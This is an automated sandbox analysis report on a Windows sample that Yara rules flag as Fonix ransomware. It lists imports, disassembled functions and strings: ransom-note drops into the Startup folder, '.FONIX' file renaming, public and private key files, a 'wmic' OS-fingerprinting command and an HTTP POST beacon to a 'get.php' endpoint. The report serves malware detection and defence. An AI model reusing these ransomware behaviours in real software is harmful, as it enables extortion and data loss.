IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xffc60	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xffb30	0x130	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xcba04	0xcbc00	False	0.472408215107	data	6.42014647338	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xcd000	0x53938	0x53a00	False	0.40311448991	data	5.43180771387	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x121000	0xbd4c	0x8a00	False	0.188688858696	data	4.87188898109	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata	0x12d000	0x9de0	0x9e00	False	0.485289754747	data	5.98253637707	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x137000	0x94	0x200	False	0.20703125	data	1.38531860657	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x138000	0x1e0	0x200	False	0.529296875	data	4.71229819329	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x139000	0x2ba0	0x2c00	False	0.00301846590909	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x138060	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.DLL	SetThreadPriority, CreateMutexW, InitializeCriticalSectionEx, FindClose, LocalAlloc, ReleaseMutex, GetLocaleInfoA, OpenProcess, SetFileAttributesW, CreateToolhelp32Snapshot, Sleep, FormatMessageW, CopyFileA, GetLastError, Process32NextW, DeleteFileA, Process32FirstW, CloseHandle, RaiseException, DecodePointer, GetDriveTypeA, LocalFree, DeleteCriticalSection, CopyFileW, WideCharToMultiByte, GetConsoleWindow, GetDiskFreeSpaceExA, OpenMutexW, GetDriveTypeW, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetCurrentThread, GetThreadTimes, SetEndOfFile, WriteConsoleW, CreateFileW, SetStdHandle, GetProcessHeap, SetEnvironmentVariableW, TerminateProcess, GetCurrentProcess, FindNextFileW, SetPriorityClass, FindFirstFileW, SetThreadPriorityBoost, SetProcessPriorityBoost, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindFirstFileExW, HeapSize, HeapReAlloc, ReadConsoleW, ReadFile, GetFileAttributesExW, CreateProcessW, GetExitCodeProcess, GetConsoleMode, GetConsoleCP, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, GetCurrentThreadId, WaitForSingleObjectEx, SwitchToThread, EncodePointer, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, SetEvent, ResetEvent, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetStartupInfoW, GetCurrentProcessId, CreateTimerQueue, SignalObjectAndWait, CreateThread, GetThreadPriority, GetLogicalProcessorInformation, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, FreeLibrary, FreeLibraryAndExitThread, GetModuleFileNameW, GetModuleHandleA, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, ReleaseSemaphore, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, LoadLibraryW, WaitForSingleObject, RtlUnwindEx, RtlPcToFileHeader, ExitProcess, GetModuleHandleExW, ExitThread, MoveFileExW, GetStdHandle, WriteFile, GetCommandLineA, GetCommandLineW, GetFileSizeEx, SetFilePointerEx, GetFileType, HeapAlloc, HeapFree, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, RtlUnwind
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameA
IPHLPAPI.DLL	GetIpNetTable
NETAPI32.dll	NetShareEnum, NetApiBufferFree
USER32.dll	GetKeyboardLayoutList, ShowWindow, MessageBoxW, SystemParametersInfoW
WININET.dll	InternetCheckConnectionA
WS2_32.dll	inet_ntoa, socket, connect, WSAGetLastError, send, WSAStartup, gethostbyname, closesocket, WSACleanup, recv, htons

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: 8QxrJSmRtc.exe PID: 6768 Parent PID: 6076

General

Start time:	17:59:58
Start date:	11/01/2021
Path:	C:\Users\user\Desktop\8QxrJSmRtc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\8QxrJSmRtc.exe'
Imagebase:	0x13b0000
File size:	1266176 bytes
MD5 hash:	6593B7AB157AC82967AF0E92EFA96134
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Fonix, Description: Yara detected Fonix ransomware, Source: 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Fonix, Description: Yara detected Fonix ransomware, Source: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 8QxrJSmRtc.exe PID: 6768 Parent PID: 6076 8QxrJSmRtc.exeCOMMON

Executed Functions

Non-executed Functions

Function 013C5D40, Relevance: 180.8, APIs: 57, Strings: 45, Instructions: 2254fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32 ref: 013C5E4C
CopyFileW.KERNEL32 ref: 013C5E72
CopyFileW.KERNEL32 ref: 013C5E91
CopyFileW.KERNEL32 ref: 013C5EB0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C60B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C60BE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C60C4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C60CA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C60D0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C60D6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C6583

Part of subcall function 013DA2A0: Concurrency::cancel_current_task.LIBCPMT ref: 013DA409
Part of subcall function 013DA2A0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DA415

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C6589
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C658F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C713F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C7145
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C714B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C7151
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C7157
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C715D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C7163
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C7169
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C716F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C7175
#115.WS2_32(?,?,00000000,?,00000000,00000000,?), ref: 013C71DC

Part of subcall function 013DE5E0: Concurrency::cancel_current_task.LIBCPMT ref: 013DE781
Part of subcall function 013DE5E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DE78D

Strings

date , xrefs: 013C65EA
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\How To Decrypt Files.hta, xrefs: 013C5E8A
copy readme , xrefs: 013C5D73
C:\ProgramData, xrefs: 013C5DC9
wmic os get Caption /value >>C:\ProgramData\OS, xrefs: 013C7FA0
March, xrefs: 013C6756
August, xrefs: 013C6896
June, xrefs: 013C6816
GET /json/ HTTP/1.1Host: , xrefs: 013C7CE5
%, xrefs: 013C7582
SystemID, xrefs: 013C61A8
size of body : , xrefs: 013C7467
February, xrefs: 013C6716
\How To Decrypt Files.hta, xrefs: 013C5DDA, 013C5E04
res : , xrefs: 013C78B3
0i@, xrefs: 013C6170, 013C65B4
Connecting..., xrefs: 013C7375, 013C7C03
osname , xrefs: 013C7F66
Gen ID , xrefs: 013C6115
April, xrefs: 013C6796
month=, xrefs: 013C69EF
September, xrefs: 013C68D6
November, xrefs: 013C6956
January, xrefs: 013C66D6
:80User-Agent: curl/7.66.0Accept: */*Content-type: text/html; charset=utf-8Content-Length: , xrefs: 013C75A8
~, xrefs: 013C6C64
Connected., xrefs: 013C745B, 013C7C9D
wwww, xrefs: 013C666C
WSAStartup failed., xrefs: 013C71EA, 013C7ABF
day=, xrefs: 013C69AA
C:\ProgramData\OS, xrefs: 013C7FC2, 013C8225
December, xrefs: 013C6996
Copy SystemID C:\ProgramData\SystemID, xrefs: 013C6437
POST /fhttpb/get.php HTTP/1.1Host: , xrefs: 013C758B
year=, xrefs: 013C6A34
May, xrefs: 013C67D6
July, xrefs: 013C6856
body : , xrefs: 013C7832
Could not connect, xrefs: 013C73AA, 013C7C34
{"query":"no ip information"}, xrefs: 013C7AE5, 013C7C55
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Help.txt, xrefs: 013C5EA9
:80User-Agent: curl/7.66.0Accept: */*Content-type: text/html; charset=utf-8Connection: close, xrefs: 013C7CFB
\Help.txt, xrefs: 013C5DEF, 013C5E18
Connection: close, xrefs: 013C7612
October, xrefs: 013C6916

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CopyFile$Concurrency::cancel_current_task$#115
String ID: Connection: close$%$0i@$:80User-Agent: curl/7.66.0Accept: */*Content-type: text/html; charset=utf-8Connection: close$:80User-Agent: curl/7.66.0Accept: */*Content-type: text/html; charset=utf-8Content-Length: $April$August$C:\ProgramData$C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Help.txt$C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\How To Decrypt Files.hta$C:\ProgramData\OS$Connected.$Connecting...$Copy SystemID C:\ProgramData\SystemID$Could not connect$December$February$GET /json/ HTTP/1.1Host: $Gen ID $January$July$June$March$May$November$October$POST /fhttpb/get.php HTTP/1.1Host: $September$SystemID$WSAStartup failed.$\Help.txt$\How To Decrypt Files.hta$body : $copy readme $date $day=$month=$osname $res : $size of body : $wmic os get Caption /value >>C:\ProgramData\OS$wwww$year=${"query":"no ip information"}$~
API String ID: 2857748787-585768687
Opcode ID: 117653914a95091cd36dae26f9b7ae51ef3912036427a2cec16dc9771fe624f2
Instruction ID: ea1078893d174a78a769d88a4130ea54fcfdf19aace7761ed964768f7e2441f9
Opcode Fuzzy Hash: 117653914a95091cd36dae26f9b7ae51ef3912036427a2cec16dc9771fe624f2
Instruction Fuzzy Hash: 1423BB72720B8586EB10DF29E88439E37A1F795BACF50521ADB9D07BA8DF78C585C700

Uniqueness

Uniqueness Score: -1.00%

Function 01421020, Relevance: 145.4, APIs: 42, Strings: 41, Instructions: 183libraryloaderCOMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(?,?,?,?,014200B1,?,?,00000000,0141FEA5,?,?,?,013DBF5B), ref: 0142102E
GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 01421069
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 0142107C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 01421093
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 014210AA
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 014210C1
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 014210D8
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 014210EF
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 01421106
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 0142111D
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 01421134
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 0142114B
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 01421162
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 01421179
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 01421190
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 014211A7
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 014211BE
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 014211D5
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 014211EC
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 01421203
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 0142121A
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 01421231
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 01421248
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 0142125F
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,014200B1,?,?,00000000,0141FEA5), ref: 01421276

Strings

kernel32.dll, xrefs: 01421062
GetLocaleInfoEx, xrefs: 014213D5
GetSystemTimePreciseAsFileTime, xrefs: 01421293
SetThreadpoolWait, xrefs: 014211AD
CreateSemaphoreW, xrefs: 0142110C
SetThreadpoolTimer, xrefs: 01421151
FlsFree, xrefs: 01421082
GetFileInformationByHandleEx, xrefs: 01421265
FlushProcessWriteBuffers, xrefs: 014211DB
LCMapStringEx, xrefs: 014213EC
InitializeSRWLock, xrefs: 01421306
CreateEventExW, xrefs: 014210F5
CloseThreadpoolWork, xrefs: 014213A7
WakeConditionVariable, xrefs: 014212C1
CloseThreadpoolWait, xrefs: 014211C4
CompareStringEx, xrefs: 014213BE
CreateThreadpoolWait, xrefs: 01421196
FlsGetValue, xrefs: 01421099
CreateSemaphoreExW, xrefs: 01421123
AcquireSRWLockExclusive, xrefs: 0142131D
SleepConditionVariableCS, xrefs: 014212EF
WaitForThreadpoolTimerCallbacks, xrefs: 01421168
CloseThreadpoolTimer, xrefs: 0142117F
TryAcquireSRWLockExclusive, xrefs: 01421334
SubmitThreadpoolWork, xrefs: 01421390
SleepConditionVariableSRW, xrefs: 01421362
FlsSetValue, xrefs: 014210B0
SetFileInformationByHandle, xrefs: 0142127C
InitializeConditionVariable, xrefs: 014212AA
GetCurrentPackageId, xrefs: 01421237
FlsAlloc, xrefs: 01421072
ReleaseSRWLockExclusive, xrefs: 0142134B
GetCurrentProcessorNumber, xrefs: 01421209
CreateThreadpoolWork, xrefs: 01421379
InitializeCriticalSectionEx, xrefs: 014210C7
FreeLibraryWhenCallbackReturns, xrefs: 014211F2
CreateThreadpoolTimer, xrefs: 0142113A
InitOnceExecuteOnce, xrefs: 014210DE
WakeAllConditionVariable, xrefs: 014212D8
CreateSymbolicLinkW, xrefs: 01421227
GetTickCount64, xrefs: 0142124E

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$EncodeHandleModulePointer
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 73157160-295688737
Opcode ID: f0d292729691eacd6dc2ab403aedc6eefcd161a23714d3ca4700cdbb34edca96
Instruction ID: 61a4a16a765ed57e57a5e4926598c88395736680763e9cba8e1b71a0e3df2f6c
Opcode Fuzzy Hash: f0d292729691eacd6dc2ab403aedc6eefcd161a23714d3ca4700cdbb34edca96
Instruction Fuzzy Hash: 03B1AB74A15B0691EE44DF95FC587E823A5FB4ABA5F854129884E47378EFBC819AC300

Uniqueness

Uniqueness Score: -1.00%

Function 014453D4, Relevance: 90.2, APIs: 36, Strings: 15, Instructions: 913COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 01445470
DName::operator+.LIBVCRUNTIME ref: 01445557
DName::operator+.LIBVCRUNTIME ref: 014455A2
DName::operator+.LIBVCRUNTIME ref: 014455C3
DName::operator+.LIBVCRUNTIME ref: 01445633
DName::operator+.LIBVCRUNTIME ref: 01445645

Strings

virtual , xrefs: 01446065
`vtordispex{, xrefs: 014459D4
private: , xrefs: 014460E2
/, xrefs: 01445EEA
protected: , xrefs: 01446114
static , xrefs: 01445FEE
`vtordisp{, xrefs: 01445AA9
public: , xrefs: 0144613B
[thunk]:, xrefs: 014461AD
extern "C" , xrefs: 01446202
`adjustor{, xrefs: 01445B08
`local static destructor helper', xrefs: 01445E62
}' , xrefs: 014455F2, 01445B33
`template static data member constructor helper', xrefs: 01445EA0
`template static data member destructor helper', xrefs: 01445EE3

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+
String ID: /$[thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
API String ID: 2943138195-2884338863
Opcode ID: 1c191f140d591d450fe98bf43f078d7e35d7d674cf00c833b4e49c9069dc3027
Instruction ID: 5c21129851d531c43fa6ac507afe7e3e1489a4156f168f54e95cb882b00457dc
Opcode Fuzzy Hash: 1c191f140d591d450fe98bf43f078d7e35d7d674cf00c833b4e49c9069dc3027
Instruction Fuzzy Hash: 03829372624B8187FB01DF29E4903AEB7A0F795354F54111BEB8A8BB68DF78C545CB40

Uniqueness

Uniqueness Score: -1.00%

Function 013BE0E0, Relevance: 79.5, APIs: 34, Strings: 10, Instructions: 2533COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF4C2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF4C8

Part of subcall function 013DE5E0: Concurrency::cancel_current_task.LIBCPMT ref: 013DE953
Part of subcall function 013DE5E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DE959

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF4D4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF4DA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF4E0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF4E6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF4EC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF4F2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF4F8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF4FE
Concurrency::cancel_current_task.LIBCPMT ref: 013BF504
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF50A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF510
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF516
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF51C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF522
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BF528

Part of subcall function 013DE5E0: Concurrency::cancel_current_task.LIBCPMT ref: 013DE781
Part of subcall function 013DE5E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DE78D

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F0D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F13
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F1F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F25
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F2B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F31
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F37
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F3D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F49
Concurrency::cancel_current_task.LIBCPMT ref: 013C0F4F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F55
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F5B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F61
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F67
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F6D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C0F73

Part of subcall function 014089F0: CryptGenRandom.ADVAPI32 ref: 01408A7C
Part of subcall function 014089F0: CryptReleaseContext.ADVAPI32 ref: 01408A97

Strings

].FONIX, xrefs: 013BF7FA
Input error , xrefs: 013BE62B, 013BFA7A
.Email=[, xrefs: 013BE158, 013BF5BC
]ID=[, xrefs: 013BE269, 013BE28F, 013BF6CF, 013BF6F5
rename error , xrefs: 013BE596, 013BF9D3
0@@, xrefs: 013BF48C, 013C0ED7
0i@, xrefs: 013BE6D4, 013BF30E, 013BFD6A, 013C0D58
].XINOF, xrefs: 013BE399
Output error , xrefs: 013BEEEE, 013C0537
::::, xrefs: 013BEFB5, 013BEFF8, 013C067F, 013C06C2

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$Crypt$ContextRandomRelease
String ID: Input error $ Output error $ rename error $.Email=[$0@@$0i@$::::$].FONIX$].XINOF$]ID=[
API String ID: 3383250404-3618363160
Opcode ID: 3640cc963b6d30a240aa77e67698380defa6c8fd5a6d7ccb8d9d5e015d703e4e
Instruction ID: fa9e6c2fd8faf5b5d371bf5e5881d769b51372b9514a7278a6d38d43e6fe07c7
Opcode Fuzzy Hash: 3640cc963b6d30a240aa77e67698380defa6c8fd5a6d7ccb8d9d5e015d703e4e
Instruction Fuzzy Hash: D3435772610BC58ADB25DF29D8943DD27A5F799B9CF40522ADB5C4BBA8EF74C284C300

Uniqueness

Uniqueness Score: -1.00%

Function 013C0F80, Relevance: 71.6, APIs: 24, Strings: 16, Instructions: 1570fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C2774
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C277A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C2786
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C278C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C2792
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C2798
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C279E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C27A4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C27AA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C27B0
Concurrency::cancel_current_task.LIBCPMT ref: 013C27B6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C27BC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C27C2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C27C8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C27CE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C27D4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C27DA

Part of subcall function 013DE5E0: Concurrency::cancel_current_task.LIBCPMT ref: 013DE781
Part of subcall function 013DE5E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DE78D

CopyFileW.KERNEL32 ref: 013C291A
CopyFileW.KERNEL32 ref: 013C2A04
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C2B77
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C2B83
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C2B8F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C2B95
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013C2B9B

Strings

].FONIX, xrefs: 013C1243
Input error , xrefs: 013C150B
.Email=[, xrefs: 013C100A
C:\ProgramData, xrefs: 013C286C
zip file, xrefs: 013C1494
\Cpriv.key, xrefs: 013C2976
]ID=[, xrefs: 013C1118, 013C113B
\Cpub.key, xrefs: 013C287D
copy to path , xrefs: 013C2816
0@@, xrefs: 013C273E
rename error , xrefs: 013C143C
0i@, xrefs: 013C17ED, 013C25BE
Cpub.key, xrefs: 013C2913
Output error , xrefs: 013C1FBE
::::, xrefs: 013C2085, 013C20C8
Cpriv.key, xrefs: 013C29FD

Memory Dump Source

